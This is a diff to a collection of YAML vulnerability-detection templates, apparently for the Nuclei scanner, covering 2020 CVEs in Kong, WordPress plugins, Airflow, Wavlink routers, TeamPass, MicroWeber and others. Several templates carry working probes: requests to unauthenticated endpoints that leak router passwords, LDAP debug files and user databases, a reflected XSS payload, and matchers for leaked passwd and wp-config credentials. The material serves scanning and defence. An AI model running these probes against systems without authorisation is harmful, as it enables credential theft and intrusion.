+  description: Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11710
+    - https://github.com/Kong/kong
+    - https://github.com/Kong/docs.konghq.com/commit/d693827c32144943a2f45abc017c1321b33ff611
+    - https://github.com/Kong/docker-kong/commit/dfa095cadf7e8309155be51982d8720daf32e31c
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -21,13 +24,15 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - 'Welcome to kong'
           - 'configuration'
           - 'kong_env'
         condition: and
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml
index 55802fd594..09b17883ef 100644
--- a/cves/2020/CVE-2020-11738.yaml
+++ b/cves/2020/CVE-2020-11738.yaml
@@ -1,23 +1,25 @@
 id: CVE-2020-11738
 
 info:
-  name: WordPress Duplicator plugin Directory Traversal
+  name: WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
   author: dwisiswant0
   severity: high
   description: |
-    The issue is being actively exploited, and allows attackers
-    to download arbitrary files, such as the wp-config.php file.
-    According to the vendor, the vulnerability was only in two
+    WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
     versions v1.3.24 and v1.3.26, the vulnerability wasn't
     present in versions 1.3.22 and before.
   reference:
     - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
+    - https://snapcreek.com/duplicator/docs/changelog/?lite
+    - https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
+    - http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11738
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-11738
     cwe-id: CWE-22
-  tags: cve,cve2020,wordpress,wp-plugin,lfi
+  tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET
@@ -41,4 +43,6 @@ requests:
           - "root:.*:0:0:"
           - "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
         condition: or
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml
index 5e665e7e3e..d97b164e6c 100644
--- a/cves/2020/CVE-2020-11853.yaml
+++ b/cves/2020/CVE-2020-11853.yaml
@@ -1,24 +1,22 @@
 id: CVE-2020-11853
 
 info:
-  name: Micro Focus Operation Bridge Manager RCE
+  name: Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution
   author: dwisiswant0
   severity: high
   description: |
-    This template supports the detection part only.
-
-    UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
-    but this template can probably also be used to detect Operations Bridge Manager
-    (containeirized) and Application Performance Management.
-
-    Originated from Metasploit module (#14654).
+    Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).
   reference:
     - http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html
+    - https://softwaresupport.softwaregrp.com/doc/KM03747658
+    - https://softwaresupport.softwaregrp.com/doc/KM03747949
+    - https://softwaresupport.softwaregrp.com/doc/KM03747948
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11853
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-11853
-  tags: cve,cve2020,opm,rce
+  tags: opm,rce,packetstorm,cve,cve2020
 
 requests:
   - method: GET
@@ -34,4 +32,6 @@ requests:
           - "HttpUcmdbServiceProviderFactoryImpl"
           - "ServerVersion=11.6.0"
         part: body
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml
index c4660d5a09..acc7fb772c 100644
--- a/cves/2020/CVE-2020-11854.yaml
+++ b/cves/2020/CVE-2020-11854.yaml
@@ -1,38 +1,39 @@
 id: CVE-2020-11854
 
 info:
-  name: Micro Focus UCMDB RCE
+  name: Micro Focus UCMDB - Remote Code Execution
   author: dwisiswant0
   severity: critical
   description: |
-    This template supports the detection part only.
-
-    UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
-    but this template can probably also be used to detect Operations Bridge Manager
-    (containeirized) and Application Performance Management.
-
-    Originated from Metasploit module (#14654).
+    Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.
   reference:
     - http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
+    - https://softwaresupport.softwaregrp.com/doc/KM03747658
+    - https://softwaresupport.softwaregrp.com/doc/KM03747657
+    - https://softwaresupport.softwaregrp.com/doc/KM03747854
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11854
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-11854
     cwe-id: CWE-798
-  tags: cve,cve2020,ucmdb,rce
+  tags: microfocus,packetstorm,cve,cve2020,ucmdb,rce
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/ucmdb-api/connect"
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
+        part: body
         words:
           - "HttpUcmdbServiceProviderFactoryImpl"
           - "ServerVersion=11.6.0"
-        part: body
-        condition: and
\ No newline at end of file
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml
index 028e791a90..feca3dbdf3 100644
--- a/cves/2020/CVE-2020-11930.yaml
+++ b/cves/2020/CVE-2020-11930.yaml
@@ -1,20 +1,23 @@
 id: CVE-2020-11930
 
 info:
-  name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
+  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
+    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
   reference:
     - https://wpscan.com/vulnerability/10181
     - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
+    - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
+    - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-11930
     cwe-id: CWE-79
-  tags: cve,cve2020,wordpress,xss,plugin
+  tags: cve,cve2020,wordpress,xss,plugin,wpscan
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
index 133d10f1d7..7bbc89cdbe 100644
--- a/cves/2020/CVE-2020-11978.yaml
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -1,25 +1,25 @@
 id: CVE-2020-11978
 
 info:
-  name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+  name: Apache Airflow <=1.10.10 - Remote Code Execution
   author: pdteam
   severity: high
-  description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated
-    user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are
-    not vulnerable.
+  description: Apache Airflow versions 1.10.10 and below are vulnerable to remote code/command injection vulnerabilities in one of the example DAGs shipped with Airflow. This could allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use).
   reference:
     - https://github.com/pberba/CVE-2020-11978
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
     - https://twitter.com/wugeej/status/1400336603604668418
+    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+  remediation: If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-11978
     cwe-id: CWE-77
   metadata:
-    verified: true
     shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
-  tags: cve,cve2020,apache,airflow,rce
+    verified: "true"
+  tags: cve,cve2020,apache,airflow,rce,kev
 
 requests:
   - raw:
@@ -62,4 +62,6 @@ requests:
         dsl:
           - 'contains(body_4, "operator":"BashOperator")'
           - 'contains(all_headers_4, "application/json")'
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml
index 9269ec11d1..b7f29ed87b 100644
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@@ -4,17 +4,17 @@ info:
   name: Apache Cocoon 2.1.12 XML Injection
   author: pikpikcu
   severity: high
-  description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used
-    to access any file on the server system.
+  description: Apache Cocoon 2.1.12 is susceptible to  XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
   reference:
     - https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11991
+    - https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
+  remediation: Upgrade to Apache Cocoon 2.1.13 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-11991
     cwe-id: CWE-611
-  remediation: Upgrade to Apache Cocoon 2.1.13 or later.
   metadata:
     shodan-query: http.html:"Apache Cocoon"
   tags: cve,cve2020,apache,xml,cocoon,xxe
diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml
index 4f6f1cde3d..105250058f 100644
--- a/cves/2020/CVE-2020-12054.yaml
+++ b/cves/2020/CVE-2020-12054.yaml
@@ -1,18 +1,22 @@
 id: CVE-2020-12054
 
 info:
-  name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
+  name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
+  description: |
+    WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
   reference:
     - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+    - https://wpvulndb.com/vulnerabilities/10184
+    - https://cxsecurity.com/issue/WLB-2020040144
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12054
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-12054
     cwe-id: CWE-79
-  tags: cve,cve2020,wordpress,xss,wp-plugin
+  tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020
 
 requests:
   - method: GET
@@ -35,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-12127.yaml b/cves/2020/CVE-2020-12127.yaml
new file mode 100644
index 0000000000..411c8418ad
--- /dev/null
+++ b/cves/2020/CVE-2020-12127.yaml
@@ -0,0 +1,41 @@
+id: CVE-2020-12127
+
+info:
+  name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure
+  author: arafatansari
+  severity: high
+  description: |
+    An information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12127
+    - https://cerne.xyz/bugs/CVE-2020-12127
+    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-12127
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.html:"Wavlink"
+    verified: "true"
+  tags: cve,cve2020,wavlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Login='
+          - 'Password='
+          - 'Model='
+          - 'AuthMode='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-12447.yaml b/cves/2020/CVE-2020-12447.yaml
index 53dfe1c9e7..bf3bf2f717 100644
--- a/cves/2020/CVE-2020-12447.yaml
+++ b/cves/2020/CVE-2020-12447.yaml
@@ -4,10 +4,11 @@ info:
   name: Onkyo TX-NR585 Web Interface - Directory Traversal
   author: 0x_Akoko
   severity: high
-  description: "Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion."
+  description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.
   reference:
     - https://blog.spookysec.net/onkyo-lfi
     - https://nvd.nist.gov/vuln/detail/CVE-2020-12447
+    - https://blog.spookysec.net/onkyo-lfi/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2020/CVE-2020-12478.yaml b/cves/2020/CVE-2020-12478.yaml
new file mode 100644
index 0000000000..065718ec4b
--- /dev/null
+++ b/cves/2020/CVE-2020-12478.yaml
@@ -0,0 +1,41 @@
+id: CVE-2020-12478
+
+info:
+  name: TeamPass 2.1.27.36 - Unauthenticated Access
+  author: arafatansari
+  severity: high
+  description: |
+    TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
+  reference:
+    - https://github.com/nilsteampassnet/TeamPass/issues/2764
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12478
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-12478
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.html:"teampass"
+    verified: "true"
+  tags: cve,cve2020,teampass,exposure,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/files/ldap.debug.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Get all LDAP params'
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml
index c2675dd95a..429e6fef80 100644
--- a/cves/2020/CVE-2020-12720.yaml
+++ b/cves/2020/CVE-2020-12720.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
     - https://nvd.nist.gov/vuln/detail/CVE-2020-12720
+    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
+    - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-12720
     cwe-id: CWE-89,CWE-306
-  tags: cve,cve2020,vbulletin,sqli
+  tags: cve2020,vbulletin,sqli,packetstorm,cve
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml
index 480fb2e7f3..3b2acc1bfd 100644
--- a/cves/2020/CVE-2020-12800.yaml
+++ b/cves/2020/CVE-2020-12800.yaml
@@ -1,18 +1,22 @@
 id: CVE-2020-12800
 
 info:
-  name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE
+  name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file.
+  description: |
+    WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
   reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-12800
     - https://github.com/amartinsec/CVE-2020-12800
+    - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html
+    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-12800
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,wp-plugin,upload
+  tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive
 
 requests:
   - raw:
@@ -52,11 +56,12 @@ requests:
     req-condition: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body_2
         words:
           - "CVE-2020-12800-{{randstr}}"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml
index 11bdb17c11..9951041e70 100644
--- a/cves/2020/CVE-2020-13117.yaml
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -1,13 +1,13 @@
 id: CVE-2020-13117
 
 info:
-  name: Wavlink Multiple AP - Unauthenticated RCE
+  name: Wavlink Multiple AP - Remote Command Injection
   author: gy741
   severity: critical
-  description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized
-    which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
+  description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.
   reference:
     - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13117
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -44,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-13158.yaml b/cves/2020/CVE-2020-13158.yaml
index a52d26c091..c4c2648f06 100644
--- a/cves/2020/CVE-2020-13158.yaml
+++ b/cves/2020/CVE-2020-13158.yaml
@@ -1,10 +1,10 @@
 id: CVE-2020-13158
 
 info:
-  name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
+  name: Artica Proxy Community Edition <4.30.000000 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
+  description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter.
   reference:
     - https://github.com/InfoSec4Fun/CVE-2020-13158
     - https://sourceforge.net/projects/artica-squid/files/
@@ -30,3 +30,6 @@ requests:
       - type: status
         status:
           - 200
+
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index b66327cc8f..feb7792cd2 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -1,14 +1,15 @@
 id: CVE-2020-13167
 
 info:
-  name: Netsweeper WebAdmin unixlogin.php Python Code Injection
+  name: Netsweeper <=6.4.3 - Python Code Injection
   author: dwisiswant0
   severity: critical
-  description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and
-    allows injection of shell metacharacters.
+  description: |
+    Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
     - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13167
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -30,10 +31,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "nonexistent"
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-13258.yaml b/cves/2020/CVE-2020-13258.yaml
new file mode 100644
index 0000000000..b6a2df338a
--- /dev/null
+++ b/cves/2020/CVE-2020-13258.yaml
@@ -0,0 +1,40 @@
+id: CVE-2020-13258
+
+info:
+  name: Contentful - Cross-Site Scripting
+  author: pikpikcu
+  severity: medium
+  description: |
+    Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.
+  reference:
+    - https://github.com/contentful/the-example-app.py/issues/44
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-13258
+    cwe-id: CWE-79
+  tags: cve,cve2020,contentful,xss
+
+requests:
+  - raw:
+      - |
+        GET /?cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "{'api': '"
+          - "</script><script>alert(document.domain)</script>',"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2020/CVE-2020-13405.yaml b/cves/2020/CVE-2020-13405.yaml
new file mode 100644
index 0000000000..12407d9ae9
--- /dev/null
+++ b/cves/2020/CVE-2020-13405.yaml
@@ -0,0 +1,47 @@
+id: CVE-2020-13405
+
+info:
+  name: MicroWeber - Unauthenticated User Database Disclosure
+  author: ritikchaddha,amit-jd
+  severity: high
+  description: |
+    The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
+  reference:
+    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
+    - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-13405
+    cwe-id: CWE-306
+  metadata:
+    shodan-query: http.html:"microweber"
+    verified: "true"
+  tags: cve,cve2020,microweber,unauth,disclosure
+
+requests:
+  - raw:
+      - |
+        POST /module/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}admin/view:modules/load_module:users
+
+        module={{endpoint}}
+
+    payloads:
+      endpoint:
+        - "users/controller"
+        - "modules/users/controller"
+        - "/modules/users/controller"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"username")'
+          - 'contains(body,"password")'
+          - 'contains(body,"password_reset_hash")'
+          - 'status_code==200'
+          - 'contains(all_headers,"text/html")'
+        condition: and
diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml
index 82a960c043..9b9c930456 100644
--- a/cves/2020/CVE-2020-13483.yaml
+++ b/cves/2020/CVE-2020-13483.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-13483
 
 info:
-  name: Bitrix24 through 20.0.0 allows XSS
+  name: Bitrix24 through 20.0.0 allows Cross-Site Scripting
   author: pikpikcu,3th1c_yuk1
   severity: medium
   description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
index 0e0aca3dbf..a72076a338 100644
--- a/cves/2020/CVE-2020-13700.yaml
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -1,15 +1,16 @@
 id: CVE-2020-13700
 
 info:
-  name: acf-to-rest-api wordpress plugin IDOR
+  name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
   author: pikpikcu
   severity: high
   description: |
-    An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
-    It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
-    wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+    WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.
   reference:
     - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+    - https://wordpress.org/plugins/acf-to-rest-api/#developers
+    - https://github.com/airesvsg/acf-to-rest-api
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13700
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -39,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml
index a7725bab88..8857b71317 100644
--- a/cves/2020/CVE-2020-13927.yaml
+++ b/cves/2020/CVE-2020-13927.yaml
@@ -1,15 +1,18 @@
 id: CVE-2020-13927
 
 info:
-  name: Unauthenticated Airflow Experimental REST API
+  name: Airflow Experimental <1.10.11 - REST API Auth Bypass
   author: pdteam
   severity: critical
-  description: 'The previous default setting for Airflow''s Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the
-    default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing
-    users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default'
+  description: |
+    Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.
+  remediation: |
